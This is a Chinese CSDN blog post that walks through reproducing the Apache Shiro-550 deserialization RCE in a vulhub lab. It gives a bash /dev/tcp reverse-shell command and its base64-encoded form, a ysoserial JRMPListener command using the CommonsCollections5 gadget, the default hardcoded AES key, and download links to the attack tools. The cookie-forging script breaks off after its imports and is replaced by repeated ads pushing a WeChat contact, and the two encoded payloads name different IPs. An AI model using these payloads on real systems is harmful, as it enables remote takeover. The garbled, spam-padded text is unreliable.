【Shiro反序列化漏洞】Shiro-550反序列化漏洞复现，2024年最新通用流行框架大全

2401_83946044

于 2024-04-19 01:50:36 发布

阅读量858

点赞数 15

分类专栏： 2024年程序员学习文章标签：网络安全 web安全

本文链接：https://blog.csdn.net/2401_83946044/article/details/137944051

版权

2024年程序员学习专栏收录该内容

275 篇文章 0 订阅

订阅专栏

先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

如果你需要这些资料，可以添加V获取：vip204888 （备注网络安全）

正文

根据漏洞描述，Shiro≤1.2.4版本默认使用CookieRememberMeManager，其处理cookie的流程是：

先获取cookie中的remberMe值 --> 对其base64解码 --> AES解码 --> 对解密的值反序列化

然而AES的密钥是硬编码的，就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞

payload 构造的顺序则就是相对的反着来：

构造恶意命令 --> 序列化 --> AES加密 --> base64编码 --> 发送cookie值

在整个漏洞利用过程中，比较重要的是AES加密的密钥，该秘钥默认是默认硬编码的，所以如果没有修改默认的密钥，就自己可以生成恶意构造的cookie了。

给师傅们分享一个我很喜欢的博主画的理解图，这个还是很形象地展示了黑客攻击的流程。

0x3 靶场搭建

1、环境准备

Ubantu（192.168.103.161）搭建靶场环境，先下载docker，然后利用docker安装vulhub
kali（192.168.103.129）攻击机，用于接收靶机的反弹shell的

利用docker-compose启动靶场环境：

docker-compose up -d

在查看下镜像以及端口：

docker ps

然后浏览器访问192.168.103.161:8080/，得到下面的界面：

2、漏洞复现

我们先利用burp抓个登录包给大家看看rememberme字段是什么，再让大家更加好理解这个shiro漏洞。勾选记住密码选项后，点击登录，抓包，观察请求包中是否有rememberme字段，响应包中是否有Set-cookie:rememberMe=deleteMe字段。类似于下图这样：

我看了很多CSDN博主写的，判断其是否有shiro漏洞，总结分析如下：

未登陆的情况下，请求包的cookie中没有rememberMe字段，返回包set-Cookie里也没有deleteMe字段
登陆失败的话，不管勾选RememberMe字段没有，返回包都会有rememberMe=deleteMe字段
不勾选RememberMe字段，登陆成功的话，返回包set-Cookie会有rememberMe=deleteMe字段。但是之后的所有请求中Cookie都不会有rememberMe字段
勾选RememberMe字段，登陆成功的话，返回包set-Cookie会有rememberMe=deleteMe字段，还会有rememberMe字段，之后的所有请求中Cookie都会有rememberMe字段

shiro_attack工具

对于shiro550，其漏洞的核心成因是cookie中的身份信息进行了AES加解密，用于加解密的密钥应该是绝对保密的，但在shiro版本<=1.2.24的版本中使用了固定的密钥。

因此，验证漏洞的核心应该还是在于我们（攻击者）可否获得这个AES加密的密钥，如果确实是固定的密钥**kPH+bIxk5D2deZiIxcaaaA==**或者其他我们可以通过脚本工具爆破出来的密钥，那么shiro550漏洞才一定存在。

我们利用shiro_attack工具进行图形化的分析，下面是这个工具的下载地址：

链接：https://pan.baidu.com/s/1C408FR_n1t-XbIlbPLNczw?pwd=pso6 
提取码：pso6

利用java -jar 启动里面的.jar文件

java -jar shiro_attack-2.2.jar

我们可以看到，这个图形化的工具就很清楚检测出这个url存在shiro框架，并且还爆破出来了shiro550的迷人AES加密的key值：kPH+bIxk5D2deZiIxcaaaA==，这样就可以证明这个url存在shiro漏洞。

我们还可以进行命令执行等操作

BurpShiroPassiveScan.jar插件

我们还可以直接使用burp的抓包工具里面的插件，下面是下载链接：

百度网盘下载：
https://pan.baidu.com/s/1LFRF34kHKG5LljboSpjSkA
提取码：j43f

我们直接在burp里面添加这个插件

当BurpSuite抓取到Shiro的数据包时会自动进行检测Key，当发现存在Shiro默认key时会有相应的告警

构造cookie，反弹shell

1、

先kali监听：

┌──(root💀kali)-[~]
└─# nc -lvnp 6666

然后我们先利用kali攻击机搭建VPS服务，存放反弹shell的payload1，IP为kali的IP地址

bash -i >& /dev/tcp/192.168.103.129/6666 0>&1

当命令中包含重定向 ’ < ’ ’ > ’ 和管道符 ’ | ’ 时，需要进行 base64 编码绕过检测。可以使用在线网站对命令进行编码，网址为：

Runtime.exec Payload Generater | AresX’s Blog

得到的编码结果如下：

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMy4xMjkvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}

2、

接下来我们利用序列化工具ysoserial.jar（工具下载，开始的百度网盘里面有）生成payload，命令如下：

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMy4xMjkvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}"

java -cp ysoserial.jar: 这部分指示 Java 运行一个程序，并通过 -cp 参数设置了 classpath，告诉 Java 解释器在哪里可以找到 ysoserial.jar 文件以及它所依赖的其他类。**ysoserial.ja**r 包含了 ysoserial 工具的代码和依赖项。
ysoserial.exploit.JRMPListener 7777: 这是执行的 Java 类和它的参数。ysoserial.exploit.JRMPListener 是 ysoserial 中一个用于创建 JRMP（Java Remote Method Protocol）监听器的类。7777 是监听器将侦听的端口号。这个监听器将会等待远程 Java 应用程序连接到它，并利用反序列化漏洞。
CommonsCollections5: 这是 ysoserial 中内置的一个 payload，利用了 Apache Commons Collections 库中的反序列化漏洞。CommonsCollections5 是 ysoserial 中的一种预定义 payload 类型，表示使用的是该库中的第五种利用方式。
"bash -c {echo,CmJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yMDAuMTMxLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}": 这是 payload 的一部分，它会在成功利用漏洞后在目标系统上执行的命令。这个命令是一个经过 base64 编码的字符串，它的含义是将 bash 的标准输入连接到一个通过 base64 解码后执行的命令。解码后的命令是 bash -c 'bash -i >& /dev/tcp/192.168.200.131/6666 0>&1'，它的作用是在目标系统上执行一个反向 shell，将 shell 的输入和输出重定向到指定的 IP 地址和端口，这样攻击者就可以远程控制目标系统。

3、

我们接下来进行AES加密 —> base64加密 —> 然后生成rememberMe字段

import sys
import uuid


**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）**
![img](https://img-blog.csdnimg.cn/img_convert/0ceaa08290957442fcaaa8623bfd9213.png)

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**

import uuid


**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）**
[外链图片转存中...(img-5TVNocGY-1713462619979)]

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**

2401_83946044

关注

15
点赞
踩
18

收藏

觉得还不错? 一键收藏
0
评论
【Shiro反序列化漏洞】Shiro-550反序列化漏洞复现，2024年最新通用流行框架大全

我们可以看到，这个图形化的工具就很清楚检测出这个url存在shiro框架，并且还爆破出来了shiro550的迷人AES加密的key值：kPH+bIxk5D2deZiIxcaaaA==，这样就可以证明这个url存在shiro漏洞。对于shiro550，其漏洞的核心成因是cookie中的身份信息进行了AES加解密，用于加解密的密钥应该是绝对保密的，但在。，该秘钥默认是默认硬编码的，所以如果没有修改默认的密钥，就自己可以生成恶意构造的cookie了。的，就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。
复制链接

扫一扫